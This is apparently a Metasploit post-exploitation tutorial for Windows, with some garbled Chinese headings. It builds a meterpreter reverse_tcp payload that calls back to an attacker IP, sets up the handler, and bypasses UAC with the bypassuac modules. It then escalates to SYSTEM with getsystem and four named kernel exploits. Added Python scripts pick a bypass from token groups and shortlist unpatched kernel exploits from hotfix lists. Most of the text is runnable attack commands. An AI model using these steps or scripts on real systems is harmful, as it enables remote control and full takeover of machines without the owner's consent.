First establish a session; everything below is the post-exploitation phase.
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -b "\x00\xff" -i 7 -f exe -o /root/1.exe    # first generate a meterpreter payload
Here -b excludes the bad characters \x00 and \xff, -i 7 runs the encoder seven times, and the handler below must use the same payload, LHOST and LPORT (4444 is also the handler's default).
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.80.163
msf exploit(handler) > exploit
繞過(guò)UAC限制
exploit/windows/local/bypassuac 和 exploit/windows/local/bypassuac_injection
什么是UAC(用戶賬戶控制)?,例如:

msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set lhost 192.168.80.163
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit
meterpreter > getsystem    # the session returned by bypassuac is an elevated (high-integrity) administrator; getsystem then takes it to NT AUTHORITY\SYSTEM, which getuid confirms
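Before reaching for bypassuac it is worth checking what kind of token the session actually holds, since the modules only work for a local administrator running at medium integrity. The following is an added example, not code from the original page or from Metasploit: it classifies the output of `whoami /groups` (run through the meterpreter `shell` command, or compare with `run post/windows/gather/win_privs`) by looking at the Administrators SID and the mandatory-label SID. The two sample outputs are constructed for illustration, and the verdict strings are names chosen here, not Metasploit terminology.

```python
import re

# Constructed sample of `whoami /groups` from a local administrator whose session
# still runs at medium integrity: exactly the state the bypassuac modules target.
# (Not captured from the page's target; assumed for illustration.)
SAMPLE_MEDIUM_ADMIN = r"""
GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192
"""

# Constructed sample for a plain standard user: no Administrators membership at all.
SAMPLE_STANDARD_USER = r"""
Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192
"""

ADMIN_SID = "S-1-5-32-544"            # BUILTIN\Administrators
INTEGRITY_SIDS = {                    # mandatory-label SIDs reported by whoami
    "S-1-16-8192": "medium",
    "S-1-16-12288": "high",
    "S-1-16-16384": "system",
}
SID_RE = re.compile(r"S-1-\d+(?:-\d+)+")


def parse_groups(output):
    """Return (set of SIDs, integrity level name or None, admin_deny_only flag)."""
    sids, integrity, admin_deny_only = set(), None, False
    for line in output.splitlines():
        m = SID_RE.search(line)
        if not m:
            continue
        sid = m.group(0)
        sids.add(sid)
        if sid in INTEGRITY_SIDS:
            integrity = INTEGRITY_SIDS[sid]
        # A filtered (unelevated) admin token lists Administrators as "used for deny only".
        if sid == ADMIN_SID and "deny only" in line.lower():
            admin_deny_only = True
    return sids, integrity, admin_deny_only


def recommend(output):
    """Map the token state to the next step described in the text."""
    sids, integrity, _ = parse_groups(output)
    if integrity == "system":
        return "already_system"
    if integrity == "high":
        return "already_elevated_run_getsystem"   # UAC already passed; bypassuac is unnecessary
    if ADMIN_SID in sids:
        return "bypassuac_candidate"              # admin at medium integrity: UAC is the obstacle
    return "not_admin_bypassuac_will_fail"        # standard user: these modules cannot help


if __name__ == "__main__":
    for name, sample in (("medium admin", SAMPLE_MEDIUM_ADMIN),
                         ("standard user", SAMPLE_STANDARD_USER)):
        print(f"{name}: {recommend(sample)}")
```

The "deny only" attribute on BUILTIN\Administrators is the tell-tale of a filtered admin token; once bypassuac has delivered a high-integrity session the same group shows up as enabled and the script reports that getsystem alone is enough.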
Escalating to SYSTEM through Windows kernel vulnerabilities (these only work on targets missing the corresponding patch and matching the module's OS version and architecture; check with info before running one)
exploit/windows/local/ms13_053_schlamperei
exploit/windows/local/ms13_081_track_popup_menu
exploit/windows/local/ms13_097_ie_registry_symlink
exploit/windows/local/ppr_flatten_rec
msf > use exploit/windows/local/ms13_053_schlamperei
msf exploit(ms13_053_schlamperei) > set session 1
msf exploit(ms13_053_schlamperei) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms13_053_schlamperei) > set lhost 192.168.80.163
msf exploit(ms13_053_schlamperei) > exploit
meterpreter > getsystem    # when the kernel exploit succeeds the new session already runs as NT AUTHORITY\SYSTEM, so this is a no-op; confirm with getuid
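Each of the four local exploits above needs a target that is missing a specific update, so a quick triage against the installed hotfixes saves firing kernel exploits (which can bluescreen the box) at a patched machine. Metasploit's own post/multi/recon/local_exploit_suggester does this check from inside the framework; the script below is an added offline equivalent, not code from the page or from Metasploit. The KB mapping is assumed from the 2013 Microsoft bulletins (MS13-053 -> KB2850851, MS13-081 -> KB2870008, MS13-097 -> KB2898785) and should be verified against the bulletins; the hotfix listing is a constructed sample.

```python
import re

# Constructed sample of `wmic qfe get HotFixID` output (the parser also accepts the
# hotfix section of `systeminfo`, since it only looks for KB tokens). Not from the page's target.
SAMPLE_QFE = """
HotFixID
KB2850851
KB2862330
KB2883200
"""

# Which update closed the hole each module exploits. Assumed from the 2013 Microsoft
# bulletins; verify against the bulletin before trusting a result.
MODULE_PATCH = {
    "exploit/windows/local/ms13_053_schlamperei":         "KB2850851",  # MS13-053
    "exploit/windows/local/ppr_flatten_rec":              "KB2850851",  # CVE-2013-3660, also MS13-053
    "exploit/windows/local/ms13_081_track_popup_menu":    "KB2870008",  # MS13-081
    "exploit/windows/local/ms13_097_ie_registry_symlink": "KB2898785",  # MS13-097
}

KB_RE = re.compile(r"\bKB\d{6,7}\b")


def installed_hotfixes(text):
    """Set of KB identifiers found in a hotfix listing."""
    return set(KB_RE.findall(text))


def candidate_modules(hotfixes):
    """Modules whose fixing KB is absent from the hotfix list, in page order.

    Absence is only a hint: a later cumulative update (common for the IE fix) can
    supersede the KB without it appearing by name, and each module still has its
    own OS version / architecture targets that must match.
    """
    return [m for m, kb in MODULE_PATCH.items() if kb not in hotfixes]


def triage(text):
    """Full pass over hotfix output: returns (patched_modules, candidate_modules)."""
    hf = installed_hotfixes(text)
    patched = [m for m, kb in MODULE_PATCH.items() if kb in hf]
    return patched, candidate_modules(hf)


if __name__ == "__main__":
    patched, candidates = triage(SAMPLE_QFE)
    print("patched (skip):", patched)
    print("candidates (check targets with info, then try):", candidates)
```

With the sample listing, KB2850851 is present, so both MS13-053 modules are ruled out and only the MS13-081 and MS13-097 modules remain worth trying; treat that as a shortlist to confirm with `info` and the suggester, not as proof the target is vulnerable.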